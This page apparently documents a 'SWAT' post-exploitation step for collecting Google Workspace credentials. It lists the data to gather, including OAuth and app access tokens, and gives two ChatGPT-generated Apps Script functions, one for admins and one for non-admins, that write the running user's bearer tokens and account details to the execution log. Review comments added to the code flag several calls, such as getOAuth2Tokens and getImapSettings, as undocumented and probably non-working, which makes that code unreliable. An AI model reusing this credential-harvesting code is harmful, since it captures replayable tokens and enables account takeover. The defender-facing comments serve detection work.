Collect the credential data that SWAT needs in order to carry out post-exploitation actions.
Requirements if user is a Google Workspace Admin:
- Google Admin SDK API enabled
Collect:
- Account name
- Email address
- Account permissions
- App access tokens
- OAuth tokens
ChatGPT example scripts (generated by ChatGPT; confirm each call against the Apps Script reference before relying on it):
Google Workspace Admin
/**
 * Reads the active user's directory record and writes five labelled lines
 * to the Apps Script execution log: account name, email address, an
 * "accessibility" value, and the same token listing twice.
 *
 * Review notes for defenders:
 * - Everything passed to Logger.log lands in the script's execution log,
 *   so token material written here is readable by anyone who can open
 *   that log. Treat any run of this function as a secret exposure and
 *   revoke the listed grants afterwards.
 * - NOTE(review): getImapSettings and getOAuth2Tokens do not appear to be
 *   documented methods of the Admin SDK Directory advanced service's
 *   Users collection; this looks like generated code that was never
 *   executed. Verify before assuming it runs.
 * - The script needs the Admin SDK advanced service enabled and an
 *   admin-level consent grant; that grant and the resulting directory
 *   reads are what an audit-log review should look for.
 */
function getAccountInfo() {
  const email = Session.getActiveUser().getEmail();
  const directoryEntry = AdminDirectory.Users.get(email);

  // Label/value pairs in the order they are logged. The lookups run here,
  // before any log line is written, so a failing call logs nothing.
  const report = [
    ["Account Name: ", directoryEntry.name.fullName],
    ["Email Address: ", email],
    ["Account Permissions: ", AdminDirectory.Users.getImapSettings(email).accessibility],
    // The same call is made twice; both entries carry identical data.
    ["App Access Tokens: ", AdminDirectory.Users.getOAuth2Tokens(email).items],
    ["OAuth Tokens: ", AdminDirectory.Users.getOAuth2Tokens(email).items],
  ];

  report.forEach(([label, value]) => {
    Logger.log(label + value);
  });
}
Google Workspace Non-Admin
/**
 * Gathers the active user's email, a username value and two token values,
 * then writes them to the Apps Script execution log as one object with
 * the keys name, email, accessToken and appAccessToken.
 *
 * Review notes for defenders:
 * - ScriptApp.getOAuthToken() returns the bearer token of the user running
 *   the script. Logging it puts a live credential into the execution log;
 *   anyone who can read that log can replay it until it expires.
 * - NOTE(review): getUsername() on the Session user, and passing a scope
 *   URL to ScriptApp.getAuthorizationInfo() followed by getAccessToken(),
 *   do not match the documented Apps Script API as far as this review can
 *   tell. Treat these lines as unverified generated code.
 * - Running the script requires the user to accept a consent prompt for
 *   its scopes; unexpected consent grants to unfamiliar script projects
 *   are the signal to review.
 */
function getUserInfo() {
  const activeUser = Session.getActiveUser();
  const email = activeUser.getEmail();
  const name = activeUser.getUsername();

  // Token of the account executing the script.
  const accessToken = ScriptApp.getOAuthToken();

  const externalRequestScope = 'https://www.googleapis.com/auth/script.external_request';
  const appAccessToken = ScriptApp.getAuthorizationInfo(externalRequestScope).getAccessToken();

  // Key order matches the original object literal.
  Logger.log({ name, email, accessToken, appAccessToken });
}
Google Apps Script
Initial Access SWAT collection script